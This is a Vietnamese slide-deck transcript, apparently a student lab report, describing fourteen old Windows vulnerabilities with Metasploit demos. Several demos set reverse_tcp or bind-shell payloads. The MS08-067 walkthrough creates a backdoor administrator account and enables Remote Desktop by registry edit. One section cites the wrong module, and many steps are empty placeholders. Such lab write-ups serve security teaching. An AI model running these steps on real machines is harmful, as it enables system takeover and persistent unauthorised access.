Loi baomat windows(f)

55
LỖ HỎNG BẢO MẬT TRONG WINDOWS 1. Lỗ hổng MS13-071: a. Mô tả: Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm như vậy. b. Phần mềm bị ảnh hưởng: Windows XP Windows Vista Windows Server 2003 Windows Server 2008 c. Demo:

Transcript of Loi baomat windows(f)

Page 1: Loi baomat windows(f)

LỖ HỎNG BẢO MẬT TRONG WINDOWS

1. Lỗ hổng MS13-071:

a. Mô tả:

Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ

công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc

áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm

như vậy.

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Vista

Windows Server 2003

Windows Server 2008

c. Demo:

Sử dụng mã lỗi ms13-071

Page 2: Loi baomat windows(f)

Set payload reverse_tcp

Set các giá trị option

Tiến hành exploit

Page 3: Loi baomat windows(f)

Bắt được session của victim

Page 4: Loi baomat windows(f)

2. Lỗ hổng MS13-080:

a. Mô tả:

Các lỗ hổng nghiêm trọng nhất có thể cho phép thực thi mã từ xa nếu người dùng xem một trang

web thiết kế đặc biệt sử dụng Internet Explorer . Một kẻ tấn công khai thác thành công nghiêm trọng

nhất của các lỗ hổng có thể lấy được quyền sử dụng giống như người dùng hiện hành . Người dùng có

tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với

những người dùng hoạt động với người sử dụng quyền hành chính.

b. Phần mềm bị ảnh hưởng:

Internet Explorer 6, 7, 8, 9, 10, 11

c. Demo:

Sử dụng mã lỗi ms13-080

Page 5: Loi baomat windows(f)

Set payload reverse_tcp

Set lhost

Page 6: Loi baomat windows(f)

Set srvhost và ruipath

Tiến hành Exploit

Page 7: Loi baomat windows(f)

Bắt được session của victim

Page 8: Loi baomat windows(f)

3. Lỗ hổng MS10-042:

a. Mô tả:

Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc

biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một

thông báo e-mail.

b. Phần mềm bị ảnh hưởng:

Windows XP Service Pack 2 and Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

c. Demo:

Sử dụng mã lỗi ms10-042

Set payload reverse_tcp và

set giá trị srvhost và lhost

Page 9: Loi baomat windows(f)

Tiến hành exploit

Bắt được session của victim

Page 10: Loi baomat windows(f)

4. Lỗ hổng MS12-027:

a. Mô tả:

Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng truy cập một trang web có chứa

nội dung đặc biệt được thiết kế để khai thác lỗ hổng. Trong mọi trường hợp, tuy nhiên, kẻ tấn công sẽ

không có cách nào để buộc người dùng truy cập một trang web như vậ. Thay vào đó, kẻ tấn công sẽ

phải thuyết phục người dùng truy cập các trang web, thường bằng cách cho họ bấm vào một liên kết

trong một email hoặc tin nhắn chỉ dẫn họ đến trang web của kẻ tấn công . Các tập tin độc hại có thể

được gửi như một file đính kèm email, nhưng những kẻ tấn công sẽ phải thuyết phục người sử dụng mở

file đính kèm để khai thác lỗ hổng.

b. Phần mềm bị ảnh hưởng:

Microsoft Office 2003, Microsoft Office 2007; Microsoft Office 2010 (except x64-based

editions); Microsoft SQL Server 2000 Analysis Services, Microsoft SQL Server 2000 (except

Itanium-based editions), Microsoft SQL Server 2005 (except Microsoft SQL Server 2005

Express Edition, but including Microsoft SQL Server 2005 Express Edition with Advanced

Services), Microsoft SQL Server 2008, Microsoft SQL Server 2008 R2, Microsoft BizTalk

Server 2002, Microsoft Commerce Server 2002, Microsoft Commerce Server 2007, Microsoft

Commerce Server 2009, Microsoft Commerce Server 2009 R2, Microsoft Visual FoxPro 8.0,

Microsoft Visual FoxPro 9.0, and Visual Basic 6.0 Runtime

c. Demo:

Sử dụng mã lỗi ms12-027

Page 11: Loi baomat windows(f)

Set payload và các giá trị option cần

thiết

Tiến hành exploit

Page 12: Loi baomat windows(f)

Di chuyển tập tin word vừa tạo ra

desktop và gửi cho victim

Tiến hành cấu hình handler để lắng

nghe

Page 13: Loi baomat windows(f)

Set payload và option của handler

Tiến hành run handler và kết quả khi

victim chạy tập tin word, ta bắt được

session của viction

Page 14: Loi baomat windows(f)

5. Lỗ hổng MS09-050:

a. Mô tả:

Một lỗ hổng nghiêm trọng (Dos và Exec code) có thể cho phép thực thi mã từ xa nếu kẻ tấn

công gửi một gói SMB thiết kế đặc biệt với một máy tính chạy các dịch vụ Server.

b. Phần mềm bị ảnh hưởng:

Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2

Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista

x64 Edition Service Pack 2

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service

Pack 2

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems

Service Pack 2

Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based

Systems Service Pack 2

c. Demo:

Sử dụng mã lỗi ms09-050

Page 15: Loi baomat windows(f)

Set payload reverse_tcp

và các option cần thiết

Tiến hành exploit và bắt

được session của victim

Page 16: Loi baomat windows(f)

6. Lỗ hổng MS10-046:

a. Mô tả:

Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi

mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác

thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.

Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh

hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.

Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này

thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã

độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một

thư mục chứa tập tin shortcut nhúng mã độc.

Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng.

Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows

Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc"

(Blue Screen of Death - BSOD).

b. Phần mềm bị ảnh hưởng:

Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

Windows Vista Service Pack 1 and Windows Vista Service Pack 2

Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service

Pack 2

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems

Service Pack 2

Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based

Systems Service Pack 2

Windows 7 for 32-bit Systems

Windows 7 for x64-based Systems

Windows Server 2008 R2 for x64-based Systems

Page 17: Loi baomat windows(f)

Windows Server 2008 R2 for Itanium-based Systems

c. Demo

1.

2.

Page 18: Loi baomat windows(f)

3.

4.

Page 19: Loi baomat windows(f)

5.

6.

7.

Page 20: Loi baomat windows(f)

8.

9.

Page 21: Loi baomat windows(f)

10.

11.

Page 22: Loi baomat windows(f)

7. Lỗ hổng MS12-020:

a. Mô tả:

Hai lỗ hổng bảo mật riêng tư trong Remote Desktop Protocol (Exec Code và DoS). Lỗ hổng có

thể cho phép thực thi mã từ xa nếu một kẻ tấn công gửi một chuỗi các gói RDP thiết kế đặc biệt với

một hệ thống bị ảnh hưởng. Theo mặc định, Remote Desktop Protocol (RDP) không được kích hoạt

trên bất kỳ hệ điều hành Windows. Các hệ thống không đã kích hoạt RDP không có nguy cơ.

b. Phần mềm bị ảnh hưởng:

Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

Windows Vista Service Pack 2

Windows Vista x64 Edition Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for Itanium-based Systems Service Pack 2

Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1

Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based

Systems Service Pack 1

Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-

based Systems Service Pack 1

c. Demo

Page 23: Loi baomat windows(f)

Sử dụng mã lỗi

ms12-020

Set options

Tiến hành run

Page 24: Loi baomat windows(f)

Máy của victim đã

bị dump

8. Lỗ hổng MS11-080:

a. Mô tả:

Lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công đăng nhập vào hệ thống của người sử

dụng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công phải có các thông tin đăng nhập hợp lệ

và có thể đăng nhập cục bộ để khai thác lỗ hổng.

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Server 2003

c. Demo

Sử dụng mã lỗi ms13-080

Page 25: Loi baomat windows(f)

Set payload và các option cần

thiết

Tiến hành exploit

Khi victim truy cập vào link thì

chúng ta bắt được session của

victim

Page 26: Loi baomat windows(f)

9. Lỗ hổng MS12-004:

a. Mô tả:

Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện

truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử

dụng giống như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng

ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử

dụng quyền hành chính..

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

c. Demo

1. Use exploit/windows/browser/ms12_004_midi

Page 27: Loi baomat windows(f)

2. Xem IP máy attacker:Ifconfig

3. set SRVHOST máy attacker

Page 28: Loi baomat windows(f)

4. set PAYLOAD windows/meterpreter/reverse_tcp

5. set LHOST 192.168.0.7

Page 29: Loi baomat windows(f)

6. Tiến hành Exploit

7.

Page 30: Loi baomat windows(f)

10. Lỗ hổng MS10-073:

a. Mô tả:

một số lỗ hổng bảo mật được tiết lộ công khai trong các trình điều khiển hạt nhân-mode

Windows. Nghiêm trọng nhất trong số các lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công

đăng nhập vào một hệ thống bị ảnh hưởng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công

phải có các thông tin đăng nhập hợp lệ và có thể đăng nhập cục bộ để khai thác lỗ hổng này. Dễ bị tổn

thương không thể bị khai thác từ xa hoặc bởi người dùng vô danh.

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

c. Demo:

1.

Page 31: Loi baomat windows(f)

2.

3.

Page 32: Loi baomat windows(f)

4.

5.

Page 33: Loi baomat windows(f)

11. Lỗ hổng MS10-061:

a. Mô tả:

Các lỗ hổng có thể cho phép thực thi mã từ xa nếu kẻ tấn công gửi một yêu cầu in thiết kế đặc

biệt với một hệ thống dễ bị tổn thương có một giao diện spooler in tiếp xúc qua RPC . Theo mặc định ,

máy in không được chia sẻ trên bất kỳ hệ điều hành Windows hỗ trợ.

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

c. Demo:

1.

Page 34: Loi baomat windows(f)

2. nmap 2.2.2.105

Page 35: Loi baomat windows(f)

12. Lỗ hổng MS10-046:

a. Mô tả:

một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi

mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác

thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.

Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh

hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

c. Demo:

1.

Page 36: Loi baomat windows(f)

2.

3.

Page 37: Loi baomat windows(f)

4.

5.

Page 38: Loi baomat windows(f)

6.

7.

Page 39: Loi baomat windows(f)

8.

9.

Page 40: Loi baomat windows(f)

10.

11.

Page 41: Loi baomat windows(f)

12.

13.

14.

Page 42: Loi baomat windows(f)

13. Lỗ hổng MS11-006:

a. Mô tả:

một lỗ hổng được công bố công khai trong bộ vi xử lý đồ họa Windows Shell. Các lỗ hổng có

thể cho phép thực thi mã từ xa nếu người dùng xem một hình ảnh thu nhỏ thiết kế đặc biệt. Một kẻ tấn

công khai thác thành công lỗ hổng này có thể lấy được quyền sử dụng giống như người dùng đăng

nhập vào. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể

được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.

b. Phần mềm bị ảnh hưởng:

Windows XP

Windows Server 2003

Windows Vista

Windows Server 2008

c. Demo:

1.

Page 43: Loi baomat windows(f)

2.

3.

4.

Page 44: Loi baomat windows(f)

5.

6.

7.

8.

Page 45: Loi baomat windows(f)

14. Lỗ hổng MS08-067:a. Mô tả:

Các lỗ hổng có thể cho phép thực thi mã từ xa nếu một hệ thống bị ảnh hưởng nhận được yêu

cầu RPC đặc biệt. Trên Microsoft Windows 2000, Windows XP, và 2003 hệ thống Windows Server, kẻ

tấn công có thể khai thác lỗ hổng này mà không cần xác thực để chạy mã nhị phân. Có thể là lỗ hổng

này có thể được sử dụng trong crafting của một wormable khai thác. Tường lửa thực hành tốt nhất và

cấu hình tường lửa mặc định tiêu chuẩn có thể giúp bảo vệ tài nguyên mạng từ các cuộc tấn công có

nguồn gốc bên ngoài chu vi doanh nghiệp.

b. Phần mềm bị ảnh hưởng:

Microsoft Windows 2000 Service Pack 4

Windows XP Service Pack 2

Windows XP Service Pack 3

Windows XP Professional x64 Edition

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 1

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP1 for Itanium-based Systems

Windows Server 2003 with SP2 for Itanium-based Systems

Windows Vista and Windows Vista Service Pack 1

Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1

Windows Server 2008 for 32-bit Systems

Windows Server 2008 for x64-based Systems

Windows Server 2008 for Itanium-based Systems

c. Demo:

Page 46: Loi baomat windows(f)

1. Khởi động chương trình msfgui Chọn menu Exploits windows More… smb ms08_067_netapi

2. Phần Targets để Automatics Targeting

Page 47: Loi baomat windows(f)

3. Về Payload chọn windows/shell_bind_tcp

4. RHOST: Điền IP của máy Victim

5. Click Run exploit

Page 48: Loi baomat windows(f)

6. Nếu Exploit thành công sẽ có 1 session được tạo ra, double click vào session đó để vào cmd của máy Victim

7. Để kiểm tra xem đây có phải là cmd của máy Victim không. Ta dùng lệnh ipconfig

8. Tạo 1 user: luanvan, password: 123 với lệnhnet user luanvan 123 /add

Page 49: Loi baomat windows(f)

9. Add user vừa tạo vào group Administrators bằng lệnhnet localgroup administrators luanvan /add

10. Remote desktop tới máy Victim thất bại vì máy Victim chưa bật Remote Desktop

Page 50: Loi baomat windows(f)

11. Để bật chức năng remote Desktop của máy Victim ta dùng lệnh:reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

12. Hoàn toàn chiếm được quyền điều khiển máy Victim